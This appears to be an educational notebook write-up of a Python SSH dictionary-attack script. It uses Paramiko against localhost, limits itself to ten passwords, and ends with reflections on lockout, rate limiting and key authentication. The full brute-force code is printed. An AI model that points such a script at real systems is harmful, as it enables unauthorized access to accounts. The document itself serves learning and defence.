# SSH Brute-Force with Paramiko and Pwntools

In this project, I built a simple brute-force script to attempt SSH login using the `Paramiko` library in Python. The script tries a list of passwords (from `100k-most-used-passwords-NCSC.txt`) to find a valid credential for SSH login on a local machine. I also imported `Pwntools`, but it’s not heavily used here.

## Step 1: Imports and setting Up the SSH Client

The first thing I needed to do was set up the SSH client. `Paramiko` is great for this because it allows you to interact with SSH servers easily. I started by importing `paramiko` and `pwn`, though I mainly used `paramiko` for the actual SSH work.

I told the client to automatically accept any unknown host keys using AutoAddPolicy. This is important because when you connect to an SSH server for the first time, you usually get a warning about the server's SSH key not being recognized. By setting this policy, I avoid these errors during my brute-force attempt.

In [2]:
from pwn import *
import paramiko

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())


## Step 2: Open and strip each password in the password file

I used a context manager (with open(...) as passwords_list) to open the file containing the password candidates.
I enumerated through the list of passwords. Each time, I stripped the newline character and then used it in an attempt to connect to the SSH server with the client.connect() method.

In [3]:
with open("100k-most-used-passwords-NCSC.txt", "r") as passwords_list:
for attempt, password in enumerate(passwords_list):
    if attempt == 10:
        break
    password = password.strip("\n")
    print("[{}] Attempting password: '{}' !".format(attempt, password))

IndentationError: expected an indented block after 'with' statement on line 1 (242515931.py, line 2)

## Step 3: Attempt each Password

For each password in the list, I made an SSH connection attempt using:

In [ ]:
client.connect(
    hostname="127.0.0.1",
    port=22,
    username="username",
    password=password,
    timeout=1
)

## Step 4: If connection succeeded

If the connection succeeded, it meant the password was correct, and I printed a success message and stopped further attempts by setting found_valid_password = True and breaking out of the loop.

In [ ]:
if found_valid_password:
    print("[>] Valid password found: '{}'!".format(password))
    break

## Step 5: Handling exceptions

A major part of the script was handling the different exceptions that could occur during each connection attempt. SSH connections might fail for various reasons, so I caught and handled a few common exceptions:

paramiko.AuthenticationException: This is raised when the password is incorrect.

paramiko.SSHException: This covers other SSH-related errors (e.g., transport issues).

A general Exception to catch unexpected errors, like timeouts.

This way, I ensured that the script wouldn’t crash on errors, and instead it would continue trying the next password.

In [ ]:
except paramiko.AuthenticationException:
    print(f"[X] Invalid password: '{password}'")
except paramiko.SSHException as e:
    print(f"[!] SSH error: {e}")
except Exception as e:
    print(f"[!] Other error: {e}")


In [ ]:
# At the end of each attempt, I made sure to close the SSH client to avoid resource leaks, using a finally block to ensure this happens no matter what.

finally:
    client.close()


## Step 6: Outcome

If a valid password was found during the loop, the script prints a success message and exits early. If no valid password was found after all attempts, it prints a message saying so.

## Lessons learned, reflections and conclusion

What I Learned:

Paramiko is a very straightforward library for interacting with SSH, making it easy to create simple brute-force scripts in Python for educational purposes.

Real-World Relevance: This script is a good reminder of how attackers might use brute-force or dictionary attacks to gain unauthorized access to systems, especially if they can guess or find weak passwords.

Security Measures: This project also highlighted the need for strong password policies, SSH key authentication, and defense mechanisms like lockout mechanisms and rate-limiting to prevent such attacks.

Performance Considerations:
Even with just 10 attempts in this example, it’s clear that brute-forcing takes time, especially with large wordlists. If I were trying to crack SSH credentials for a real attack, it would likely require optimizations like parallel processing or distributed cracking to speed things up.

Exception Handling and Clean-Up:
I also realised how important it is to handle exceptions properly in repeated connection attempts, as failing to do so can lead to resource leaks or misleading error states. This is why I included client.close() in the finally block after each attempt to ensure the connection is properly cleaned up.

Conclusion
This project was a hands-on way to explore SSH brute-forcing and password cracking techniques, and it really reinforced the importance of secure authentication practices. It also gave me a deeper understanding of how attackers might try to gain access to systems and how to defend against such methods.

# Full code

In [ ]:
from pwn import *
import paramiko

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

found_valid_password = False

with open("100k-most-used-passwords-NCSC.txt", "r") as passwords_list:
    for attempt, password in enumerate(passwords_list):
        if attempt == 10:
            break
        password = password.strip("\n")
        print("[{}] Attempting password: '{}' !".format(attempt, password))
        try:
            client.connect(
                hostname="127.0.0.1",
                port=22,
                username="username",
                password=password,
                timeout=1
            )

            print("[>] Valid password found: '{}'!".format(password))
            found_valid_password = True
            break
        except paramiko.AuthenticationException:
            print(f"[X] Invalid password: '{password}'")
        except paramiko.SSHException as e:
            print(f"[!] SSH error: {e}")
        except Exception as e:
            print(f"[!] Other error: {e}")
        finally:
            client.close()

if not found_valid_password:
    print("No valid password found in the list.")
